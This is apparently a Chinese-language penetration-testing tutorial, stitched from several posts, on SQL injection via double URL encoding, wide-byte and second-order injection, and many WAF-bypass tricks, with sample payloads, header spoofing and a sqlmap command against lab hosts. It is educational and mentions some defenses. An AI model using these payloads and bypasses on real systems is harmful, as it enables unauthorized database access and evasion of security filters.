01 背景知识
一、为什么要进行URL编码
通常如果一样东西需要编码，说明这样东西并不适合传输。对于URL来说，编码主要是为了避免引发歧义与混乱。
例如，URL参数字符串中使用key=value键值对这样的形式来传参，键值对之间以&符号分隔，如/?name=abc&pwd=123如果你的value字符串中包含了=或者&，那么势必会造成接收Url的服务器解析错误，因此必须将引起歧义的&和= 符号进行转义，也就是对其进行编码。
对于URL编码的深入研究可以参看下面这些内容：
为什么要进行URL编码
深入分析 web 请求响应中的编码问题
二、URL传输过程中的编码问题
HTTP请求过程经历的几个环节：
浏览器【get/post】①========>服务器②========>浏览器显示③
①：浏览器会把URL经过编码后发送给服务器，不同的浏览器对URL的编码规则不同。对于GET方式提交的数据，浏览器会自动进行URL编码；对于POST方式提交的数据，其编码方式可以由开发者进行指定。
②：服务器根据其自身的配置文件对URL进行解码(解码成Unicode)，然后将显示内容编码。
③：浏览器按照指定的编码显示该网页。
此外，在客户端也就是浏览器上运行的前端程序也会根据Web服务的需要对要传输的数据进行一些编码操作，而在服务端除了服务器中间件会自动对URL进行解码，后端的Web程序会对前端进行编码的数据进行解码操作。
02 二次编码注入
下面这幅图片很好地解释了二次编码注入的原理(图片来源为网易Web安全工程师课程，侵删)：
二次编码注入
从中我们也可以得知，二次编码注入产生的原因是：
后端程序的编码函数，如urldecode()等，与PHP本身处理编码时，两者配合失误，使得攻击者可以构造数据消灭\
看一下实例代码：
//用GET方式获取id值，并对其中的特殊字符进行转义
$id = mysql_real_escap_string($_GET['id']);
//使用urldecode()函数进行解码
$id = urldecode($id);
$sql = "SELECT * FROM usres WHERE id = '$id' LIMIT 0,1;
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
上面的代码就是一个二次注入的典型场景，这时如果我们提交：
http://127.0.0.1/sql.php?id=1%2527
就可以绕过对'的转义，进行SQL注入攻击。
在测试时，如果发现了页面可能存在二次编码注入漏洞，也可以使用sqlmap进行自动化攻击
//只需在注入点后键入%2527即可
python sqlmap.py -u "http://127.0.0.1/sql.php?id=1%2527"
分享一个二次编码注入的漏洞实例

SQL注入绕过WAF的本质：既保证语句的正常运行结果，又防止WAF软件的正常匹配来实现绕过
1.更改提交方式

例如把GET提交方式更改为POST提交方式

局限性：网页的提交方式必须为REQUEST，否则无法正常接收，网页内容显示不正常。
2.大小写绕过

例如：1 and 1=1 修改为 1 AnD 1=1
3.双写绕过

例如：-1 union select 1,2,3# 修改为 -1 ununionion seselectlect 1,2,3#
4.编码绕过

例如：-1 union select 1,2,3# 修改为  -1%20%75nion%20%73elect%201,2,3#
5.内联注释绕过

例如：-1 union select 1,2,3# 修改为  -1 /**/union /**/select 1,2,3# 或者-1 /*!union*/ /*!select*/ 1,2,3#
6.#注释绕过

例如：-1 union select 1,2,3# 修改为 -1 union%23a%0Aselect 1,2,3#

语句为：-1 union#a

select 1,2,3#
7.参数污染绕过

参数污染简介

web服务器为：PHP/Apache，只接收后面的参数。

例如：-1 union select 1,2,3# 修改为1/**&id=-1%20union%20select%201,2,3%23*/
8.等价替换绕过

Hex() bin() 等价于ascii()

Sleep() 等价于 benchmark()

Mid()substring() 等价于 substr()

@@user 等价于 User()

@@Version 等价于 version()

and=& or=|  等等
9.ip白名单绕过

从网络层获取的ip，这种一般伪造不来，如果是获取客户端的IP，这样就可能存在伪造IP绕过的情况。

绕过方法：修改http的header来绕过 waf

X-forwarded-for

X-remote-IP

X-originating-IP

x-remote-addr

X-Real-ip
10.静态资源绕过

特定的静态资源后缀请求，常见的静态文件(.js .jpg .swf .css等等)，类似白名单机制，waf为了检测效率，不去检测这样一些静态文件名后缀的请求。

例如：http://x.x.x.x/xxx.php?id=1 and 1=1 修改为 http://x.x.x.x/xxx.php/1.txt?id=1 and 1=1
11.url白名单绕过

部分waf内置默认的白名单列表，如admin/manager/system等管理后台。只要url中存在白名单的字符串，就作为白名单不进行检测。

例如：http://x.x.x.x/xxx.php/admin.php?id=1 这个url不会进行拦截
12.爬虫白名单绕过

部分waf有提供爬虫白名单的功能，识别爬虫的技术一般有两种：

1、 根据UserAgent ：我们可以通过修改请求包中的User-Agent来伪装成搜索引擎爬虫。

2、通过行为来判断
还有很多等待更新

一、宽字节注入
1、什么是宽字节
GB2312、GBK、GB18030、BIG5等这些都是常说的宽字节，实际为两字节
2、宽字节注入原理
防御：将 ' 转换为 \'
绕过：将 \ 消灭
mysql在使用GBK编码的时候，会认为两个字符为一个汉字
\      编码为 %5c
'      编码为%27
%df%5c   mysql会认为是一个汉字
构造：
%df'    %df\'     %df%5c%27  其中%df%5c将成为一个汉字专为   汉字'  从而绕过了/的转义
注：前一个ascii码大于128才能到汉字的范围
注入方法：在注入点后键入%df，然后按照正常的注入流程开始注入
工具注入方法：
在注入点后面手动添加%df即可 (没成功。。。)
白盒测试：
1、查看mysql编码是否为GBK
2、是否使用preg_replace把单引号替换成 \'
3、是否使用addslashes进行转义
4、是否使用mysql_real_escape_string进行转义
宽字节防御
1、使用UTF-8，避免宽字节
不仅GBK、韩文、日文等等都是宽字节，都有可能存在诸如漏洞
2、mysql_real_escape_string, mysql_set_charset('gbk',$conn);
3、可以设置参数， character_set_client=binary
二、二次编码注入
在url中可能出现一些特殊字符，如= & ； +
为了避免冲突，需要转移
index.php?id=1&name=admin&pwd=123
mysql会对url提交的编码进行自动转换
例如：url中的%3d，mysql会自动转为=
宽字节和二次编码注入：
是在面对php代码或配置，对输入的'(单引号)进行转义的时候，在处理用户输入数据时存在问题，可以绕过转义
二次编码注入是由于两次编码转义冲突导致出现的注入点
注入方法：在注入点后键入%2527，然后按照正常的注入流程开始注入
白盒测试
1、是否使用urldecode函数
2、urldecode函数是否在转义方法之后
三、二次注入
第一步， 插入恶意数据
保留了原来的数据，插入到数据库
第二步，引用恶意数据
在将数据存入到了数据库中之后，开发者未经验证，直接引用
例如修改密码
输入admin'#
在修改密码过程中，将会修改admin的密码
select concat_ws(0x7e,username,password) from security
四、Waf绕过原理分析
sql注入是***测试与waf防御最激烈的战场
1、白盒绕过
1)大小写变形
2)等价替换：and -> &&, or -> ||
3)。。。
2、黑盒绕过
一、架构层绕过
1) 寻找源站
2)利用同网段
3)利用边界漏洞
二、资源限制角度绕过
1、POST大BODY
三、协议层面绕过WAF的检测
1、协议未覆盖绕过WAF
*请求方式变换 get  ->  post
*content-type变换
2、参数污染
index.php?id=1&id=2
id=1
id=2
waf可能只检测id=1
四、规则层面的绕过
1、sql注释符绕过
level-1   union/**/select
level-2   union/*ajlsjdlf*/select
2 空白符绕过
mysql空白符：%09，%0A。。。
正则空白符：  %09，%0A
example-1：union%250Cselect
3函数分分割符号
在函数和数据中间引入一些内容
concat%2520(
concat/**/(
concat%250c(
4 浮点数词法解析
select * from users where id=8E0union select 1,2,3,4
5 利用error-based进行sql注入：error-based sql注入函数非常容易被忽略
extractvalue(1, concat(0x5c,md5(3)));
updatexml(1,concat(0x5d,md5(3)),1);
6 mysql特殊语法
select{x table_name}from{x information_schema.tables};
五、Fuzz绕过waf
1、注释符绕过
*先测试最基本的： union/**/select
*再测试中间引入特殊字：union/*aaaa%01bbs*/select
*最后测试注释长度：union/*aaaaaaaaaaaaaaaa*/select
最基本的模式
union/*something*/select
将空格替换为/*sldfj$%^&*/
特殊函数 xx() 替换为 xx/*sldfj$%^&*/()
六、SQLmap waf绕过脚本编写

一）SQL注入绕过手段

1）大小写绕过

2）双写绕过

3）编码绕过

4）内联注释绕过

5）去除注释符的代码分析【less-23】

  a）绕过去除注释符的SQL注入

  b）sqlmap安全检测

6）去除and和or的代码分析【less-25】

  a）绕过去除and和or的SQL注入

  b）sqlmap安全检测

7）去除空格的代码分析【less-26】

  a）绕过去除空格的SQL注入

  b）sqlmap安全检测

8）去除union、select的代码分析【less-27】

  a）绕过去除union、select的SQL注入

  b）sqlmap安全检测
二）补充知识
————————————————————————————————————————————————————————


一）SQL注入绕过手段






1）大小写绕过
如果程序中设置了过滤关键字但是过滤过程中并没有对关键字组成进行深入分析过滤，导致只是对整体进行过滤。例如：and 过滤，也就是说只是发现关键字出现并不会对关键字处理，对于这种方式的过滤我们可以采用“ 大小写绕过 ”这种过滤措施，例如：And 1=1 ，OrdEr by。




2）双写绕过
如果在程序中设置出现关键字之后就将其替换为空（例如：一旦出现关键字“ union ”就将其替换为“”（空）），那么此时SQL注入攻击也就不会发生了。对于这样的过滤策略我们可以使用双写绕过（例如：一旦出现关键字“ union ”就将其替换为“”那么就使用双写绕过：ununionion，此时过滤策略会将中间的union变成“”（空），之后剩下的un“”ion——>union）。也可以双写绕过结合大小写绕过：UnunioniOn


3）URL编码绕过



我们可以利用网络中的URL在线编码以此绕过SQL注入的过滤机制，如在线编码工具：

https://www.sojson.com/encodeurl.html



或者：http://tool.chinaz.com/Tools/urlencode.aspx





4）内联注释绕过
对于正常的SQL语句来说，注释符是起到解释说明的功能，但是在利用SQL注入漏洞中，注释符起到了闭合单引号、双引号、单括号、多括号等的功能。
在mysql的语法中，有三种注释方法：--空格、--+和#（单行注释）和 /* */（多行注释）如果在/*后加惊叹号 ! 意为/* */里的语句将被执行。（/!内容/这种方法只适用于mysql数据库）
普通注释绕过：

例如：un/**/ion——>union、se/**/lect ——>select（常用注释符：//,-- (空格) ,/**/, #,--+,-- -,;--a ）
内联注释绕过

例如：http://192.168.67.140/sqli/Less-7/?id=-1' /*!union*/ sel/**/ect 1,2,3 --+





5）去除注释符的代码分析：


上面的代码主要是用于过滤注释符的。

preg_replace(mixed $pattern,mixed $replacement,mixed $subject)——执行一个正则表达式的搜索和替换

解析：
第一个参数是 “指定要搜索的字符或字符串”，
第二个参数是 “要替换的新的字符或字符串”，
第三个参数是 “我们要进行搜索的原字符串”

所以，此时$id中一旦输入了“#”或者“/--/”就会被替换为"",从而使得注释符不生效。



a）绕过去除注释符的SQL注入：
因为网站使用了preg_replace()过滤注释符，那么之前的 --+和–空格等注释符就不能在使用了，所以我们可以使用 or ‘1’='1 去闭合单引号，或者：
http://192.168.67.143/Less-23/?id=-1' union select 1,database(),'3

此时将单引号加在3前面去闭合id=’'中的后一个单引号。







b）sqlmap安全检测：





6）去除and和or的代码分析：
在mysql中大小写不敏感，也就是说大写或者小写的效果是一样的，并且在mysql中可以自动对十六进制和URL编码进行转码识别，所以即使直接将十六进制和URL编码赋给mysql也可以正常执行；同时，在mysql中符号和关键字可以进行等效的替换，也就是说，and和&&等效，or和||等效。


前面我们已经对preg_replace()函数进行了功能和参数的详解，此处就不再累赘解释。以上的代码
中对用于接收用户输入的变量id的值进行了过滤，一旦id中出现了“or”或者“and”（不区分大小写）
就将它们全都替换为""。加上“i”其实是“ignore”就是为了实现不区分大小写的效果。


a）绕过去除and和or的SQL注入：
对于将“and”和“or”进行过滤的机制，如果没有加 “i” 那么可以采用大小绕过过滤，如果加上了 “i” 那么大小写绕过的方法就无效了。
当我们输入 and或者And或者or或者Or发现均无效就说明对 “and” 和 “or” 进行了不区分大小写的过滤：








此时，可以采用以下三种方法：
方法一：（注释符） 在这两个敏感词中添加注释，例如：a/**/nd，而在mysql中/**/中的内容被注释掉不执行所以有效的还是and，o/**/r==>or。
方法二：（双写） 利用双写绕过，例如：aandnd，此时过滤机制会检测到id接收的值中有“and”这个敏感词，所以将它过滤（替换为""），所以此时就剩下aandnd==>and，oorr==>or。





方法三：（符号代替） 利用mysql中的and==&&，or==||，所以如果将“and”和“or”过滤，我们可以采用“&&”和“||”代替。





b）sqlmap安全检测：





7）去除空格的代码分析


第一个是将id中的“or”替换成""（不区分大小写）
第二个是将id中的“and”替换成""（不区分大小写）
第三个是将id中的“/*”替换成“.”
第四个是将id中的“--”替换成""
第五个是将id中的“#”替换成""
第六个是将id中的“\s”替换成""（将空格替换）
第七个是将id中的“\”替换成""（一旦出现反斜杠就替换）



a）绕过去除空格的SQL注入
当网站对空格进行了过滤时，我们可以采用hex urlencode（十六进制）编码将空格进行url编码。原本的空格可以进行如下的替换（以下均为有效替换）：
空格<==>%20
%0a(新建一行)
%09(tab制表符【水平】)
%0c(新建一页)
%0d(return功能)
%0b(tab制表符【垂直】)

此时尝试 \ 发现没有任何效果，因为没过滤了：



尝试一个 ' 发现报错信息是“多了一个单引号”，所以存在字符类型的SQL注入：



因为过滤了空格，所以我们可以使用hex编码的 %0a 代替空格，又因为过滤了 or 所以使用 || 代替or：



也可以使用 %09 （Tab制表符）代替空格：





b）sqlmap安全检测





8）去除union、select的代码分析【less-26】



注意：其中的/s是指区分大小写，也就是说指定过滤“select”和“UIONN”、“Union”那么“Select”、“uNIon”等其他的还是有效的。



a）绕过去除union、select的SQL注入
综合上面的过滤代码，我们使用 %09代替空格，|| 代替 or，union和select采用大小写、双写绕过：
采用union select 时，发现union select不见了（就是被过滤成""了）：



所以我们使用大小写绕过：



又发现报错：union和select中间的空格不见了（被过滤了），所以我们用 %09 代替空格：







b）sqlmap安全检测




二）补充知识
https://blog.csdn.net/qq_25899635/article/details/90476644